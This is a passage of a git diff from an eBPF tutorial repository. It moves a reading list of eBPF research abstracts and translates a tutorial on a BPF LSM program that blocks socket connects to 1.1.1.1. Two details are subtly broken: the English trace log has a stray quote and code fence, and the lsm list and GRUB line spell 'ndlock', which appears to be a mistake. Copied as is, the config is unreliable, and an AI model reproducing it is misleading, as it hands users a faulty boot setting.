是一个为基于堆栈的虚拟机设计的二进制指令格式,其用途超出了 web。鉴于 eBPF 的增长和不断扩大的雄心,Wasm 可能提供有启发性的见解,因为它围绕在如 web 浏览器和云等复杂和敌对环境中安全执行任意不受信任的程序进行设计。我们分析了两种技术的安全目标、社区发展、内存模型和执行模型,并进行了比较安全性评估,探讨了内存安全性、控制流完整性、API 访问和旁路通道。我们的结果表明,eBPF 有一个首先关注性能、其次关注安全的历史,而 Wasm 更强调安全,尽管要支付一些运行时开销。考虑 eBPF 的基于语言的限制和一个用于 API 访问的安全模型是未来工作的有益方向。 + + + +更多内容可以在第一个 eBPF 研讨会中找到: + +## A flow-based IDS using Machine Learning in eBPF + +基于eBPF中的机器学习的流式入侵检测系统 + +eBPF 是一种新技术,允许动态加载代码片段到 Linux 内核中。它可以大大加速网络,因为它使内核能够处理某些数据包而无需用户空间程序的参与。到目前为止,eBPF 主要用于简单的数据包过滤应用,如防火墙或拒绝服务保护。我们证明在 eBPF 中完全基于机器学习开发流式网络入侵检测系统是可行的。我们的解决方案使用决策树,并为每个数据包决定它是否恶意,考虑到网络流的整个先前上下文。与作为用户空间程序实现的同一解决方案相比,我们实现了超过 20% 的性能提升。 + + + +## Femto-containers: lightweight virtualization and fault isolation for small software functions on low-power IoT microcontrollers + +针对低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离: Femto-容器 + +低功耗的 IoT 微控制器上运行的操作系统运行时通常提供基础的 API、基本的连接性和(有时)一个(安全的)固件更新机制。相比之下,在硬件约束较少的场合,网络化软件已进入无服务器、微服务和敏捷的时代。考虑到弥合这一差距,我们在论文中设计了 Femto-容器,这是一种新的中间件运行时,可以嵌入到各种低功耗 IoT 设备中。Femto-容器使得可以在低功耗 IoT 设备上通过网络安全地部署、执行和隔离小型虚拟软件功能。我们实施了 Femto-容器,并在 RIOT 中提供了集成,这是一个受欢迎的开源 IoT 操作系统。然后,我们评估了我们的实现性能,它已被正式验证用于故障隔离,确保 RIOT 受到加载并在 Femto-容器中执行的逻辑的保护。我们在各种受欢迎的微控制器架构(Arm Cortex-M、ESP32 和 RISC-V)上的实验表明,Femto-容器在内存占用开销、能源消耗和安全性方面提供了有吸引力的权衡。 + + diff --git a/src/18-further-reading/README_en.md b/src/18-further-reading/README_en.md deleted file mode 100644 index 458612e..0000000 --- a/src/18-further-reading/README_en.md +++ /dev/null @@ -1,140 +0,0 @@ -# More Reference Materials: papers, projects - -You may find more about eBPF in these places: - -- A curated list of awesome projects related to eBPF: -- A website of eBPF projects and tutorials: - -This is also list of eBPF related papers I read in recent years, might be helpful for people who are interested in eBPF related research. - -eBPF (extended Berkeley Packet Filter) is an emerging technology that allows safe execution of user-provided programs in the Linux kernel. It has gained widespread adoption in recent years for accelerating network processing, enhancing observability, and enabling programmable packet processing. - -This document list some key research papers on eBPF over the past few years. The papers cover several aspects of eBPF, including accelerating distributed systems, storage, and networking, formally verifying the eBPF JIT compiler and verifier, applying eBPF for intrusion detection, and automatically generating hardware designs from eBPF programs. - -Some key highlights: - -- eBPF enables executing custom functions in the kernel to accelerate distributed protocols, storage engines, and networking applications with improved throughput and lower latency compared to traditional userspace implementations. -- Formal verification of eBPF components like JIT and verifier ensures correctness and reveals bugs in real-world implementations. -- eBPF's programmability and efficiency make it suitable for building intrusion detection and network monitoring applications entirely in the kernel. -- Automated synthesis of hardware designs from eBPF programs allows software developers to quickly generate optimized packet processing pipelines in network cards. - -The papers demonstrate eBPF's versatility in accelerating systems, enhancing security, and simplifying network programming. As eBPF adoption grows, it is an important area of systems research with many open problems related to performance, safety, hardware integration, and ease of use. - -If you have any suggestions or adding papers, please feel free to open an issue or PR. The list was created in 2023.10, New papers will be added in the future. - -> Check out our open-source projects at [eunomia-bpf](https://github.com/eunomia-bpf) and eBPF tutorials at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial). I'm also looking for a PhD position in the area of systems and networking in 2024/2025. My [Github](https://github.com/yunwei37) and [email](yunwei356@gmail.com). - -## XRP: In-Kernel Storage Functions with eBPF - -With the emergence of microsecond-scale NVMe storage devices, the Linux kernel storage stack overhead has become significant, almost doubling access times. We present XRP, a framework that allows applications to execute user-defined storage functions, such as index lookups or aggregations, from an eBPF hook in the NVMe driver, safely bypassing most of the kernel’s storage stack. To preserve file system semantics, XRP propagates a small amount of kernel state to its NVMe driver hook where the user-registered eBPF functions are called. We show how two key-value stores, BPF-KV, a simple B+-tree key-value store, and WiredTiger, a popular log-structured merge tree storage engine, can leverage XRP to significantly improve throughput and latency. - -OSDI '22 Best Paper: - -## Specification and verification in the field: Applying formal methods to BPF just-in-time compilers in the Linux kernel - -This paper describes our experience applying formal methods to a critical component in the Linux kernel, the just-in-time compilers ("JITs") for the Berkeley Packet Filter (BPF) virtual machine. We verify these JITs using Jitterbug, the first framework to provide a precise specification of JIT correctness that is capable of ruling out real-world bugs, and an automated proof strategy that scales to practical implementations. Using Jitterbug, we have designed, implemented, and verified a new BPF JIT for 32-bit RISC-V, found and fixed 16 previously unknown bugs in five other deployed JITs, and developed new JIT optimizations; all of these changes have been upstreamed to the Linux kernel. The results show that it is possible to build a verified component within a large, unverified system with careful design of specification and proof strategy. - -OSDI 20: - -## λ-IO: A Unified IO Stack for Computational Storage - -The emerging computational storage device offers an opportunity for in-storage computing. It alleviates the overhead of data movement between the host and the device, and thus accelerates data-intensive applications. In this paper, we present λ-IO, a unified IO stack managing both computation and storage resources across the host and the device. We propose a set of designs – interface, runtime, and scheduling – to tackle three critical issues. We implement λ-IO in full-stack software and hardware environment, and evaluate it with synthetic and real applications against Linux IO, showing up to 5.12× performance improvement. - -FAST23: - -## Extension Framework for File Systems in User space - -User file systems offer numerous advantages over their in-kernel implementations, such as ease of development and better system reliability. However, they incur heavy performance penalty. We observe that existing user file system frameworks are highly general; they consist of a minimal interposition layer in the kernel that simply forwards all low-level requests to user space. While this design offers flexibility, it also severely degrades performance due to frequent kernel-user context switching. - -This work introduces ExtFUSE, a framework for developing extensible user file systems that also allows applications to register "thin" specialized request handlers in the kernel to meet their specific operative needs, while retaining the complex functionality in user space. Our evaluation with two FUSE file systems shows that ExtFUSE can improve the performance of user file systems with less than a few hundred lines on average. ExtFUSE is available on GitHub. - -ATC 19: - -## Electrode: Accelerating Distributed Protocols with eBPF - -Implementing distributed protocols under a standard Linux kernel networking stack enjoys the benefits of load-aware CPU scaling, high compatibility, and robust security and isolation. However, it suffers from low performance because of excessive user-kernel crossings and kernel networking stack traversing. We present Electrode with a set of eBPF-based performance optimizations designed for distributed protocols. These optimizations get executed in the kernel before the networking stack but achieve similar functionalities as were implemented in user space (e.g., message broadcasting, collecting quorum of acknowledgments), thus avoiding the overheads incurred by user-kernel crossings and kernel networking stack traversing. We show that when applied to a classic Multi-Paxos state machine replication protocol, Electrode improves its throughput by up to 128.4% and latency by up to 41.7%. - -NSDI 23: - -## BMC: Accelerating Memcached using Safe In-kernel Caching and Pre-stack Processing - -In-memory key-value stores are critical components that help scale large internet services by providing low-latency access to popular data. Memcached, one of the most popular key-value stores, suffers from performance limitations inherent to the Linux networking stack and fails to achieve high performance when using high-speed network interfaces. While the Linux network stack can be bypassed using DPDK based solutions, such approaches require a complete redesign of the software stack and induce high CPU utilization even when client load is low. - -To overcome these limitations, we present BMC, an in-kernel cache for Memcached that serves requests before the execution of the standard network stack. Requests to the BMC cache are treated as part of the NIC interrupts, which allows performance to scale with the number of cores serving the NIC queues. To ensure safety, BMC is implemented using eBPF. Despite the safety constraints of eBPF, we show that it is possible to implement a complex cache service. Because BMC runs on commodity hardware and requires modification of neither the Linux kernel nor the Memcached application, it can be widely deployed on existing systems. BMC optimizes the processing time of Facebook-like small-size requests. On this target workload, our evaluations show that BMC improves throughput by up to 18x compared to the vanilla Memcached application and up to 6x compared to an optimized version of Memcached that uses the SO_REUSEPORT socket flag. In addition, our results also show that BMC has negligible overhead and does not deteriorate throughput when treating non-target workloads. - -NSDI 21: - -## hXDP: Efficient Software Packet Processing on FPGA NICs - -FPGA accelerators on the NIC enable the offloading of expensive packet processing tasks from the CPU. However, FPGAs have limited resources that may need to be shared among diverse applications, and programming them is difficult. - -We present a solution to run Linux's eXpress Data Path programs written in eBPF on FPGAs, using only a fraction of the available hardware resources while matching the performance of high-end CPUs. The iterative execution model of eBPF is not a good fit for FPGA accelerators. Nonetheless, we show that many of the instructions of an eBPF program can be compressed, parallelized or completely removed, when targeting a purpose-built FPGA executor, thereby significantly improving performance. We leverage that to design hXDP, which includes (i) an optimizing-compiler that parallelizes and translates eBPF bytecode to an extended eBPF Instruction-set Architecture defined by us; a (ii) soft-processor to execute such instructions on FPGA; and (iii) an FPGA-based infrastructure to provide XDP's maps and helper functions as defined within the Linux kernel. - -We implement hXDP on an FPGA NIC and evaluate it running real-world unmodified eBPF programs. Our implementation is clocked at 156.25MHz, uses about 15% of the FPGA resources, and can run dynamically loaded programs. Despite these modest requirements, it achieves the packet processing throughput of a high-end CPU core and provides a 10x lower packet forwarding latency. - -OSDI 20: - -## Network-Centric Distributed Tracing with DeepFlow: Troubleshooting Your Microservices in Zero Code - -Microservices are becoming more complicated, posing new challenges for traditional performance monitoring solutions. On the one hand, the rapid evolution of microservices places a significant burden on the utilization and maintenance of existing distributed tracing frameworks. On the other hand, complex infrastructure increases the probability of network performance problems and creates more blind spots on the network side. In this paper, we present DeepFlow, a network-centric distributed tracing framework for troubleshooting microservices. DeepFlow provides out-of-the-box tracing via a network-centric tracing plane and implicit context propagation. In addition, it eliminates blind spots in network infrastructure, captures network metrics in a low-cost way, and enhances correlation between different components and layers. We demonstrate analytically and empirically that DeepFlow is capable of locating microservice performance anomalies with negligible overhead. DeepFlow has already identified over 71 critical performance anomalies for more than 26 companies and has been utilized by hundreds of individual developers. Our production evaluations demonstrate that DeepFlow is able to save users hours of instrumentation efforts and reduce troubleshooting time from several hours to just a few minutes. - -SIGCOMM 23: - -## Fast In-kernel Traffic Sketching in eBPF - -The extended Berkeley Packet Filter (eBPF) is an infrastructure that allows to dynamically load and run micro-programs directly in the Linux kernel without recompiling it. - -In this work, we study how to develop high-performance network measurements in eBPF. We take sketches as case-study, given their ability to support a wide-range of tasks while providing low-memory footprint and accuracy guarantees. We implemented NitroSketch, the state-of-the-art sketch for user-space networking and show that best practices in user-space networking cannot be directly applied to eBPF, because of its different performance characteristics. By applying our lesson learned we improve its performance by 40% compared to a naive implementation. - -SIGCOMM 23: - -## SPRIGHT: extracting the server from serverless computing! high-performance eBPF-based event-driven, shared-memory processing - -Serverless computing promises an efficient, low-cost compute capability in cloud environments. However, existing solutions, epitomized by open-source platforms such as Knative, include heavyweight components that undermine this goal of serverless computing. Additionally, such serverless platforms lack dataplane optimizations to achieve efficient, high-performance function chains that facilitate the popular microservices development paradigm. Their use of unnecessarily complex and duplicate capabilities for building function chains severely degrades performance. 'Cold-start' latency is another deterrent. - -We describe SPRIGHT, a lightweight, high-performance, responsive serverless framework. SPRIGHT exploits shared memory processing and dramatically improves the scalability of the dataplane by avoiding unnecessary protocol processing and serialization-deserialization overheads. SPRIGHT extensively leverages event-driven processing with the extended Berkeley Packet Filter (eBPF). We creatively use eBPF's socket message mechanism to support shared memory processing, with overheads being strictly load-proportional. Compared to constantly-running, polling-based DPDK, SPRIGHT achieves the same dataplane performance with 10× less CPU usage under realistic workloads. Additionally, eBPF benefits SPRIGHT, by replacing heavyweight serverless components, allowing us to keep functions 'warm' with negligible penalty. - -Our preliminary experimental results show that SPRIGHT achieves an order of magnitude improvement in throughput and latency compared to Knative, while substantially reducing CPU usage, and obviates the need for 'cold-start'. - - - -## KEN: Kernel Extensions using Natural Language - -The ability to modify and extend an operating system is an important feature for improving a system's security, reliability, and performance. The extended Berkeley Packet Filters (eBPF) ecosystem has emerged as the standard mechanism for extending the Linux kernel and has recently been ported to Windows. eBPF programs inject new logic into the kernel that the system will execute before or after existing logic. While the eBPF ecosystem provides a flexible mechanism for kernel extension, it is difficult for developers to write eBPF programs today. An eBPF developer must have deep knowledge of the internals of the operating system to determine where to place logic and cope with programming limitations on the control flow and data accesses of their eBPF program enforced by the eBPF verifier. This paper presents KEN, an alternative framework that alleviates the difficulty of writing an eBPF program by allowing Kernel Extensions to be written in Natural language. KEN uses recent advances in large language models (LLMs) to synthesize an eBPF program given a user's English language prompt. To ensure that LLM's output is semantically equivalent to the user's prompt, KEN employs a combination of LLM-empowered program comprehension, symbolic execution, and a series of feedback loops. KEN's key novelty is the combination of these techniques. In particular, the system uses symbolic execution in a novel structure that allows it to combine the results of program synthesis and program comprehension and build on the recent success that LLMs have shown for each of these tasks individually. To evaluate KEN, we developed a new corpus of natural language prompts for eBPF programs. We show that KEN produces correct eBPF programs on 80% which is an improvement of a factor of 2.67 compared to an LLM-empowered program synthesis baseline. - -eBPF'24: and arxiv - -## Programmable System Call Security with eBPF - -System call filtering is a widely used security mechanism for protecting a shared OS kernel against untrusted user applications. However, existing system call filtering techniques either are too expensive due to the context switch overhead imposed by userspace agents, or lack sufficient programmability to express advanced policies. Seccomp, Linux's system call filtering module, is widely used by modern container technologies, mobile apps, and system management services. Despite the adoption of the classic BPF language (cBPF), security policies in Seccomp are mostly limited to static allow lists, primarily because cBPF does not support stateful policies. Consequently, many essential security features cannot be expressed precisely and/or require kernel modifications. -In this paper, we present a programmable system call filtering mechanism, which enables more advanced security policies to be expressed by leveraging the extended BPF language (eBPF). More specifically, we create a new Seccomp eBPF program type, exposing, modifying or creating new eBPF helper functions to safely manage filter state, access kernel and user state, and utilize synchronization primitives. Importantly, our system integrates with existing kernel privilege and capability mechanisms, enabling unprivileged users to install advanced filters safely. Our evaluation shows that our eBPF-based filtering can enhance existing policies (e.g., reducing the attack surface of early execution phase by up to 55.4% for temporal specialization), mitigate real-world vulnerabilities, and accelerate filters. - - - -## Cross Container Attacks: The Bewildered eBPF on Clouds - -The extended Berkeley Packet Filter (eBPF) provides powerful and flexible kernel interfaces to extend the kernel functions for user space programs via running bytecode directly in the kernel space. It has been widely used by cloud services to enhance container security, network management, and system observability. However, we discover that the offensive eBPF that have been extensively discussed in Linux hosts can bring new attack surfaces to containers. With eBPF tracing features, attackers can break the container's isolation and attack the host, e.g., steal sensitive data, DoS, and even escape the container. In this paper, we study the eBPF-based cross container attacks and reveal their security impacts in real world services. With eBPF attacks, we successfully compromise five online Jupyter/Interactive Shell services and the Cloud Shell of Google Cloud Platform. Furthermore, we find that the Kubernetes services offered by three leading cloud vendors can be exploited to launch cross-node attacks after the attackers escape the container via eBPF. Specifically, in Alibaba's Kubernetes services, attackers can compromise the whole cluster by abusing their over-privileged cloud metrics or management Pods. Unfortunately, the eBPF attacks on containers are seldom known and can hardly be discovered by existing intrusion detection systems. Also, the existing eBPF permission model cannot confine the eBPF and ensure secure usage in shared-kernel container environments. To this end, we propose a new eBPF permission model to counter the eBPF attacks in containers. - - - -## Comparing Security in eBPF and WebAssembly - -This paper examines the security of eBPF and WebAssembly (Wasm), two technologies that have gained widespread adoption in recent years, despite being designed for very different use cases and environments. While eBPF is a technology primarily used within operating system kernels such as Linux, Wasm is a binary instruction format designed for a stack-based virtual machine with use cases extending beyond the web. Recognizing the growth and expanding ambitions of eBPF, Wasm may provide instructive insights, given its design around securely executing arbitrary untrusted programs in complex and hostile environments such as web browsers and clouds. We analyze the security goals, community evolution, memory models, and execution models of both technologies, and conduct a comparative security assessment, exploring memory safety, control flow integrity, API access, and side-channels. Our results show that eBPF has a history of focusing on performance first and security second, while Wasm puts more emphasis on security at the cost of some runtime overheads. Considering language-based restrictions for eBPF and a security model for API access are fruitful directions for future work. - - - -More about can be found in the first workshop: - -## A flow-based IDS using Machine Learning in eBPF - -eBPF is a new technology which allows dynamically loading pieces of code into the Linux kernel. It can greatly speed up networking since it enables the kernel to process certain packets without the involvement of a userspace program. So far eBPF has been used for simple packet filtering applications such as firewalls or Denial of Service protection. We show that it is possible to develop a flow based network intrusion detection system based on machine learning entirely in eBPF. Our solution uses a decision tree and decides for each packet whether it is malicious or not, considering the entire previous context of the network flow. We achieve a performance increase of over 20% compared to the same solution implemented as a userspace program. - - - -## Femto-containers: lightweight virtualization and fault isolation for small software functions on low-power IoT microcontrollers - -Low-power operating system runtimes used on IoT microcontrollers typically provide rudimentary APIs, basic connectivity and, sometimes, a (secure) firmware update mechanism. In contrast, on less constrained hardware, networked software has entered the age of serverless, microservices and agility. With a view to bridge this gap, in the paper we design Femto-Containers, a new middleware runtime which can be embedded on heterogeneous low-power IoT devices. Femto-Containers enable the secure deployment, execution and isolation of small virtual software functions on low-power IoT devices, over the network. We implement Femto-Containers, and provide integration in RIOT, a popular open source IoT operating system. We then evaluate the performance of our implementation, which was formally verified for fault-isolation, guaranteeing that RIOT is shielded from logic loaded and executed in a Femto-Container. Our experiments on various popular micro-controller architectures (Arm Cortex-M, ESP32 and RISC-V) show that Femto-Containers offer an attractive trade-off in terms of memory footprint overhead, energy consumption, and security. - - - -> The original link of this article: diff --git a/src/19-lsm-connect/README.md b/src/19-lsm-connect/README.md index 9c743f3..67f89c8 100644 --- a/src/19-lsm-connect/README.md +++ b/src/19-lsm-connect/README.md @@ -1,51 +1,51 @@ -# eBPF 入门实践教程:使用 LSM 进行安全检测防御 +# eBPF Tutorial by Example 19: Security Detection and Defense using LSM -eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying the kernel source code. This feature enables eBPF to provide high flexibility and performance, making it widely applicable in network and system performance analysis. The same applies to eBPF applications in security, and this article will introduce how to use the eBPF LSM (Linux Security Modules) mechanism to implement a simple security check program. -## 背景 +## Background -LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的) +LSM has been an official security framework in the Linux kernel since Linux 2.6, and security implementations based on it include SELinux and AppArmor. With the introduction of BPF LSM in Linux 5.7, system developers have been able to freely implement function-level security checks. This article provides an example of limiting access to a specific IPv4 address through the socket connect function using a BPF LSM program. (This demonstrates its high control precision.) -## LSM 概述 +## Overview of LSM -LSM(Linux Security Modules)是 Linux 内核中用于支持各种计算机安全模型的框架。LSM 在 Linux 内核安全相关的关键路径上预置了一批 hook 点,从而实现了内核和安全模块的解耦,使不同的安全模块可以自由地在内核中加载/卸载,无需修改原有的内核代码就可以加入安全检查功能。 +LSM (Linux Security Modules) is a framework in the Linux kernel that supports various computer security models. LSM predefines a set of hook points on critical paths related to Linux kernel security, decoupling the kernel from security modules. This allows different security modules to be loaded/unloaded in the kernel freely without modifying the existing kernel code, thus enabling them to provide security inspection features. -在过去,使用 LSM 主要通过配置已有的安全模块(如 SELinux 和 AppArmor)或编写自己的内核模块;而在 Linux 5.7 引入 BPF LSM 机制后,一切都变得不同了:现在,开发人员可以通过 eBPF 编写自定义的安全策略,并将其动态加载到内核中的 LSM 挂载点,而无需配置或编写内核模块。 +In the past, using LSM mainly involved configuring existing security modules like SELinux and AppArmor or writing custom kernel modules. However, with the introduction of the BPF LSM mechanism in Linux 5.7, everything changed. Now, developers can write custom security policies using eBPF and dynamically load them into the LSM mount points in the kernel without configuring or writing kernel modules. -现在 LSM 支持的 hook 点包括但不限于: +Some of the hook points currently supported by LSM include: -+ 对文件的打开、创建、删除和移动等; -+ 文件系统的挂载; -+ 对 task 和 process 的操作; -+ 对 socket 的操作(创建、绑定 socket,发送和接收消息等); ++ File open, creation, deletion, and movement; ++ Filesystem mounting; ++ Operations on tasks and processes; ++ Operations on sockets (creating, binding sockets, sending and receiving messages, etc.); -更多 hook 点可以参考 [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h)。 +For more hook points, refer to [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h). -## 确认 BPF LSM 是否可用 +## Verifying BPF LSM Availability -首先,请确认内核版本高于 5.7。接下来,可以通过 +First, please confirm that your kernel version is higher than 5.7. Next, you can use the following command to check if BPF LSM support is enabled: ```console $ cat /boot/config-$(uname -r) | grep BPF_LSM CONFIG_BPF_LSM=y ``` -判断是否内核是否支持 BPF LSM。上述条件都满足的情况下,可以通过 +If the output contains `CONFIG_BPF_LSM=y`, BPF LSM is supported. Provided that the above conditions are met, you can use the following command to check if the output includes the `bpf` option: ```console $ cat /sys/kernel/security/lsm ndlock,lockdown,yama,integrity,apparmor ``` -查看输出是否包含 bpf 选项,如果输出不包含(像上面的例子),可以通过修改 `/etc/default/grub`: +If the output does not include the `bpf` option (as in the example above), you can modify `/etc/default/grub`: ```conf GRUB_CMDLINE_LINUX="lsm=ndlock,lockdown,yama,integrity,apparmor,bpf" ``` -并通过 `update-grub2` 命令更新 grub 配置(不同系统的对应命令可能不同),然后重启系统。 +Then, update the grub configuration using the `update-grub2` command (the corresponding command may vary depending on the system), and restart the system. -## 编写 eBPF 程序 +## Writing eBPF Programs ```C // lsm-connect.bpf.c @@ -90,33 +90,32 @@ int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, in } return 0; } - ``` -这是一段 C 实现的 eBPF 内核侧代码,它会阻碍所有试图通过 socket 对 1.1.1.1 的连接操作,其中: +This is eBPF code implemented in C on the kernel side. It blocks all connection operations through a socket to 1.1.1.1. The following information is included: -+ `SEC("lsm/socket_connect")` 宏指出该程序期望的挂载点; -+ 程序通过 `BPF_PROG` 宏定义(详情可查看 [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h)); -+ `restrict_connect` 是 `BPF_PROG` 宏要求的程序名; -+ `ret` 是该挂载点上(潜在的)当前函数之前的 LSM 检查程序的返回值; ++ The `SEC("lsm/socket_connect")` macro indicates the expected mount point for this program. ++ The program is defined by the `BPF_PROG` macro (see [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h) for details). ++ `restrict_connect` is the program name required by the `BPF_PROG` macro. ++ `ret` is the return value of the LSM check program (potential) before the current function on this mount point. -整个程序的思路不难理解: +The overall idea of the program is not difficult to understand: -+ 首先,若其他安全检查函数返回值不为 0(不通过),则无需检查,直接返回不通过; -+ 接下来,判断是否为 IPV4 的连接请求,并比较试图连接的地址是否为 1.1.1.1; -+ 若请求地址为 1.1.1.1 则拒绝连接,否则允许连接; ++ First, if the return value of other security check functions is non-zero (failed), there is no need to check further and the connection is rejected. ++ Next, it determines whether it is an IPv4 connection request and compares the address being connected to with 1.1.1.1. ++ If the requested address is 1.1.1.1, the connection is blocked; otherwise, the connection is allowed. -在程序运行期间,所有通过 socket 的连接操作都会被输出到 `/sys/kernel/debug/tracing/trace_pipe`。 +During the execution of the program, all connection operations through a socket will be output to `/sys/kernel/debug/tracing/trace_pipe`. -## 编译运行 +## Compilation and Execution -通过容器编译: +Compile using a container: ```console docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或是通过 `ecc` 编译: +Or compile using `ecc`: ```console $ ecc lsm-connect.bpf.c @@ -124,13 +123,13 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -并通过 `ecli` 运行: +And run using `ecli`: ```shell sudo ecli run package.json ``` -接下来,可以打开另一个 terminal,并尝试访问 1.1.1.1: +Next, open another terminal and try to access 1.1.1.1: ```console $ ping 1.1.1.1 @@ -143,27 +142,29 @@ Connecting to 1.1.1.1:80... failed: Operation not permitted. Retrying. ``` -同时,我们可以查看 `bpf_printk` 的输出: +At the same time, we can view the output of `bpf_printk`: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009 ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009 curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009 - curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009 - wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 - wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009 + curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009".``` +wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 +wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009 ``` -完整源代码: +Complete source code: -## 总结 +## Summary -本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 `BPF_PROG` 宏定义函数,并通过 `SEC` 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。 +This article introduces how to use BPF LSM to restrict access to a specific IPv4 address through a socket. We can enable the LSM BPF mount point by modifying the GRUB configuration file. In the eBPF program, we define functions using the `BPF_PROG` macro and specify the mount point using the `SEC` macro. In the implementation of the function, we follow the principle of "cannot override a denial" in the LSM security-checking module and restrict the socket connection request based on the destination address of the request. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. -## 参考 +## References + + + +> The original link of this article: diff --git a/src/19-lsm-connect/README.zh.md b/src/19-lsm-connect/README.zh.md new file mode 100644 index 0000000..9c743f3 --- /dev/null +++ b/src/19-lsm-connect/README.zh.md @@ -0,0 +1,169 @@ +# eBPF 入门实践教程:使用 LSM 进行安全检测防御 + +eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。 + +## 背景 + +LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的) + +## LSM 概述 + +LSM(Linux Security Modules)是 Linux 内核中用于支持各种计算机安全模型的框架。LSM 在 Linux 内核安全相关的关键路径上预置了一批 hook 点,从而实现了内核和安全模块的解耦,使不同的安全模块可以自由地在内核中加载/卸载,无需修改原有的内核代码就可以加入安全检查功能。 + +在过去,使用 LSM 主要通过配置已有的安全模块(如 SELinux 和 AppArmor)或编写自己的内核模块;而在 Linux 5.7 引入 BPF LSM 机制后,一切都变得不同了:现在,开发人员可以通过 eBPF 编写自定义的安全策略,并将其动态加载到内核中的 LSM 挂载点,而无需配置或编写内核模块。 + +现在 LSM 支持的 hook 点包括但不限于: + ++ 对文件的打开、创建、删除和移动等; ++ 文件系统的挂载; ++ 对 task 和 process 的操作; ++ 对 socket 的操作(创建、绑定 socket,发送和接收消息等); + +更多 hook 点可以参考 [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h)。 + +## 确认 BPF LSM 是否可用 + +首先,请确认内核版本高于 5.7。接下来,可以通过 + +```console +$ cat /boot/config-$(uname -r) | grep BPF_LSM +CONFIG_BPF_LSM=y +``` + +判断是否内核是否支持 BPF LSM。上述条件都满足的情况下,可以通过 + +```console +$ cat /sys/kernel/security/lsm +ndlock,lockdown,yama,integrity,apparmor +``` + +查看输出是否包含 bpf 选项,如果输出不包含(像上面的例子),可以通过修改 `/etc/default/grub`: + +```conf +GRUB_CMDLINE_LINUX="lsm=ndlock,lockdown,yama,integrity,apparmor,bpf" +``` + +并通过 `update-grub2` 命令更新 grub 配置(不同系统的对应命令可能不同),然后重启系统。 + +## 编写 eBPF 程序 + +```C +// lsm-connect.bpf.c +#include "vmlinux.h" +#include +#include +#include + +char LICENSE[] SEC("license") = "GPL"; + +#define EPERM 1 +#define AF_INET 2 + +const __u32 blockme = 16843009; // 1.1.1.1 -> int + +SEC("lsm/socket_connect") +int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, int addrlen, int ret) +{ + // Satisfying "cannot override a denial" rule + if (ret != 0) + { + return ret; + } + + // Only IPv4 in this example + if (address->sa_family != AF_INET) + { + return 0; + } + + // Cast the address to an IPv4 socket address + struct sockaddr_in *addr = (struct sockaddr_in *)address; + + // Where do you want to go? + __u32 dest = addr->sin_addr.s_addr; + bpf_printk("lsm: found connect to %d", dest); + + if (dest == blockme) + { + bpf_printk("lsm: blocking %d", dest); + return -EPERM; + } + return 0; +} + +``` + +这是一段 C 实现的 eBPF 内核侧代码,它会阻碍所有试图通过 socket 对 1.1.1.1 的连接操作,其中: + ++ `SEC("lsm/socket_connect")` 